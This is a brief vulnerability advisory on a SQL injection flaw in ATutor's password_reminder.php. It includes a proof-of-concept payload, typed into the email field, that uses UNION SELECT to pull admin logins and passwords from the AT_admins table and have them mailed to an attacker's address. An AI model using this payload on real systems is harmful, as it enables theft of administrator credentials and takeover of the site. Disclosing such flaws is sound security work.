ATutor Password_Reminder.PHP SQL Injection Vulnerability

ATutor Password_Reminder.PHP SQL Injection Vulnerability

No exploit is required.

The following proof of concept is available:
go to http://www.example.com/atutor/password_reminder.php

and in the email field type:

' UNION SELECT login, password, 'your_email@example.com' FROM AT_admins /*